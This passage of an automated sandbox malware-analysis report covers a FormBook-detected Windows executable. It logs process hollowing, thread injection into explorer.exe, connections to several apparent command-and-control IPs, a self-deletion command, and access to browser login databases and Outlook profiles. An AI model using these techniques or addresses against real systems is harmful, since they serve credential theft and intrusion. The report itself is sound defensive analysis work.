Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC766D mov eax, dword ptr fs:[00000030h] 1_2_00AC766D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7AE44 mov eax, dword ptr fs:[00000030h] 1_2_00B7AE44
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7AE44 mov eax, dword ptr fs:[00000030h] 1_2_00B7AE44
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h] 1_2_00B37794
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h] 1_2_00B37794
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h] 1_2_00B37794
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC8794 mov eax, dword ptr fs:[00000030h] 1_2_00AC8794
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF37F5 mov eax, dword ptr fs:[00000030h] 1_2_00AF37F5
Enables debug privileges
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00465ED0 KiUserExceptionDispatcher,7344B410,GetSystemMetrics,GetSystemMetrics,ExitProcess,RtlAddVectoredExceptionHandler, 0_2_00465ED0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Memory protected: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 34.196.13.28 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.64 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.198 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 194.146.87.218 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 155.159.203.193 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.98.145.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 80.78.22.40 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section loaded: unknown target: C:\Users\user\Desktop\mp0nMsMroT.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Thread register set: target process: 3384 Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Thread register set: target process: 3384 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3384 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 60000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe' Jump to behavior
Source: explorer.exe, 00000002.00000000.188009008.00000000012B0000.00000002.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.452489924.0000000004260000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.188009008.00000000012B0000.00000002.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.452489924.0000000004260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.188009008.00000000012B0000.00000002.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.452489924.0000000004260000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.187656767.0000000000DB8000.00000004.00000020.sdmp Binary or memory string: Progmanesa
Source: explorer.exe, 00000002.00000000.188009008.00000000012B0000.00000002.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.452489924.0000000004260000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.203152657.0000000007E03000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndk

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_00405250
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA,GetACP, 0_2_0040C4C0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA, 0_2_0040AE68
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA, 0_2_0040AE1C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_0040535C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA, 0_2_00405B7A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA, 0_2_00405B7C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0040991C GetLocalTime, 0_2_0040991C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004482AC GetVersion, 0_2_004482AC

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE